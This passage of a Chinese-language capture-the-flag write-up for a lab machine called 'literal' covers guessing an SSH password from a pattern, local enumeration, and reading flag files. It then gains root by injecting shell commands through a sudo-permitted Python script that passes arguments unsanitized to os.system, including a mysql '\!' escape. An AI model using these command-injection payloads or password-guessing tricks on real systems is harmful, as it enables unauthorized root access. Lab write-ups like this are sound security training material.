[*] ending @ 13:47:11 /2025-06-08/
然后尝试破解:
1
carlos:forum100889
但是登录失败了,这里作者意思是刚刚第二个sql注入界面是一个论坛,论坛名字为forumtesting,社会工程学来看他密码取为forum100889是因为对应着平台前五位以及数字,所以他的ssh密码可能为ssh100889,确实需要一点脑洞的。。。。
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
carlos@literal:~$ whoami;id
carlos
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos)
carlos@literal:~$ ls -la
total 44
drwxr-xr-x 7 carlos carlos 4096 Apr 8 2023 .
drwxr-xr-x 3 root root 4096 Jun 15 2022 ..
lrwxrwxrwx 1 root root 9 Feb 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 carlos carlos 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 carlos carlos 3771 Feb 25 2020 .bashrc
drwx------ 2 carlos carlos 4096 Jun 21 2022 .cache
drwx------ 3 carlos carlos 4096 Jun 22 2022 .gnupg
drwxrwxr-x 3 carlos carlos 4096 Feb 12 2021 .local
drwxrwxr-x 2 carlos carlos 4096 Jun 21 2022 my_things
-rw-r--r-- 1 carlos carlos 807 Feb 25 2020 .profile
drwx------ 2 carlos carlos 4096 Sep 20 2021 .ssh
-rw-r----- 1 root carlos 33 Feb 13 2021 user.txt
carlos@literal:~$ cd my_things/
carlos@literal:~/my_things$ ls -la
total 12
drwxrwxr-x 2 carlos carlos 4096 Jun 21 2022 .
drwxr-xr-x 7 carlos carlos 4096 Apr 8 2023 ..
-rw-rw-r-- 1 carlos carlos 226 Jun 8 17:36 detalles.txt
carlos@literal:~/my_things$ cat detalles.txt
To check one day.
Blog ----:
> Blog colors.
> Validate syntax and coherence.
> Buttom to translate blog to Spanish.
> Check task on both blog and forum.
Forum ---:
> Delete default posts.
> Create custom responses to mails.
carlos@literal:~/my_things$ crontab -l
no crontab for carlos
carlos@literal:~/my_things$ cd ..
carlos@literal:~$ cat user.txt
6d3c8a6c73cf4f89eea7ae57f6eb9222
carlos@literal:~$ sudo -l
Matching Defaults entries for carlos on literal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User carlos may run the following commands on literal:
(root) NOPASSWD: /opt/my_things/blog/update_project_status.py *
找到一个脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#!/usr/bin/python3
# Learning python3 to update my project status
## (mental note: This is important, so administrator is my safe to avoid upgrading records by mistake) :P
'''
References:
* MySQL commands in Linux: https://www.shellhacks.com/mysql-run-query-bash-script-linux-command-line/
* Shell commands in Python: https://stackabuse.com/executing-shell-commands-with-python/
* Functions: https://www.tutorialspoint.com/python3/python_functions.htm
* Arguments: https://www.knowledgehut.com/blog/programming/sys-argv-python-examples
* Array validation: https://stackoverflow.com/questions/7571635/fastest-way-to-check-if-a-value-exists-in-a-list
* Valid if root is running the script: https://stackoverflow.com/questions/2806897/what-is-the-best-way-for-checking-if-the-user-of-a-script-has-root-like-privileg
'''
import os
import sys
from datetime import date
# Functions ------------------------------------------------.
def execute_query(sql):
os.system("mysql -u " + db_user + " -D " + db_name + " -e \"" + sql + "\"")
# Query all rows
def query_all():
sql = "SELECT * FROM projects;"
execute_query(sql)
# Query row by ID
def query_by_id(arg_project_id):
sql = "SELECT * FROM projects WHERE proid = " + arg_project_id + ";"
execute_query(sql)
# Update database
def update_status(enddate, arg_project_id, arg_project_status):
if enddate != 0:
sql = f"UPDATE projects SET prodateend = '" + str(enddate) + "', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"
else:
sql = f"UPDATE projects SET prodateend = '2222-12-12', prostatus = '" + arg_project_status + "' WHERE proid = '" + arg_project_id + "';"
execute_query(sql)
# Main program
def main():
# Fast validation
try:
arg_project_id = sys.argv[1]
except:
arg_project_id = ""
try:
arg_project_status = sys.argv[2]
except:
arg_project_status = ""
if arg_project_id and arg_project_status: # To update
# Avoid update by error
if os.geteuid() == 0:
array_status = ["Done", "Doing", "To do"]
if arg_project_status in array_status:
print("[+] Before update project (" + arg_project_id + ")\n")
query_by_id(arg_project_id)
if arg_project_status == 'Done':
update_status(date.today(), arg_project_id, arg_project_status)
else:
update_status(0, arg_project_id, arg_project_status)
else:
print("Bro, avoid a fail: Done - Doing - To do")
exit(1)
print("\n[+] New status of project (" + arg_project_id + ")\n")
query_by_id(arg_project_id)
else:
print("Ejejeeey, avoid mistakes!")
exit(1)
elif arg_project_id:
query_by_id(arg_project_id)
else:
query_all()
# Variables ------------------------------------------------.
db_user = "carlos"
db_name = "blog"
# Main program
main()
注意到execute_query直接执行拼接起来的命令,尝试闭合sql语句拼接进去尝试执行:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
carlos@literal:~$ /opt/my_things/blog/update_project_status.py
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| proid | proname | prodatecreated | prodateend | prostatus |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| 1 | Ascii Art Python - ABCdario with colors | 2021-09-20 17:51:59 | 2021-09-20 | Done |
| 2 | Ascii Art Python - Show logos only with letter A | 2021-09-20 18:06:22 | 2222-12-12 | To do |
| 3 | Ascii Art Bash - Show musical stores (WTF) | 2021-09-20 18:06:50 | 2222-12-12 | To do |
| 4 | Forum - Add that people can send me bug reports of projects | 2023-04-07 17:40:41 | 2023-11-01 | Doing |
| 5 | Validate syntax errors on blog pages | 2021-09-20 18:07:43 | 2222-12-12 | Doing |
| 6 | Script to extract info from files and upload it to any DB | 2021-09-20 18:07:58 | 2222-12-12 | Doing |
| 7 | Forum - Implement forum form | 2023-04-07 17:46:38 | 2023-11-01 | Doing |
| 8 | Add that people can create their own projects on DB | 2021-09-20 18:49:52 | 2222-12-12 | To do |
| 9 | Ascii Art C - Start learning Ascii Art with C | 2021-09-20 18:50:02 | 2222-12-12 | To do |
| 10 | Ascii Art Bash - Welcome banner preview in blog home | 2021-09-20 18:50:08 | 2222-12-12 | To do |
| 11 | Blog - Create login and register form | 2023-04-07 17:40:28 | 2023-08-21 | Done |
| 12 | Blog - Improve the appearance of the dashboard/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py 1
+-------+-----------------------------------------+---------------------+------------+-----------+
| proid | proname | prodatecreated | prodateend | prostatus |
+-------+-----------------------------------------+---------------------+------------+-----------+
| 1 | Ascii Art Python - ABCdario with colors | 2021-09-20 17:51:59 | 2021-09-20 | Done |
+-------+-----------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py 12
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| proid | proname | prodatecreated | prodateend | prostatus |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
| 12 | Blog - Improve the appearance of the dashboard/projects page | 2021-09-20 18:50:18 | 2222-12-12 | Doing |
+-------+--------------------------------------------------------------+---------------------+------------+-----------+
carlos@literal:~$ /opt/my_things/blog/update_project_status.py '";whoami;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
carlos
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos)
sh: 1: ;: not found
carlos@literal:~$ sudo /opt/my_things/blog/update_project_status.py '";whoami;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
root
uid=0(root) gid=0(root) groups=0(root)
sh: 1: ;: not found
然后尝试sudo即可获取rootshell!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
carlos@literal:~$ sudo /opt/my_things/blog/update_project_status.py '";bash;id;"'
ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
root@literal:/home/carlos# cd ~
root@literal:~# ls -la
total 36
drwx------ 5 root root 4096 Jun 8 15:20 .
drwxr-xr-x 20 root root 4096 Feb 7 2021 ..
lrwxrwxrwx 1 root root 9 Feb 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4096 Sep 18 2021 .cache
drwxr-xr-x 3 root root 4096 Feb 12 2021 .local
drwxr-xr-x 3 root root 4096 Jun 17 2022 my_things
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 33 Feb 13 2021 root.txt
-rw-r--r-- 1 root root 74 Sep 20 2021 .selected_editor
root@literal:~# cat root.txt
ca43cb966ef76475d9e0736feeb9f730
还看到有一种解法为:
1
sudo /opt/my_things/blog/update_project_status.py '\! /bin/bash' Done
也挺好!!!
本文由作者按照 CC BY 4.0 进行授权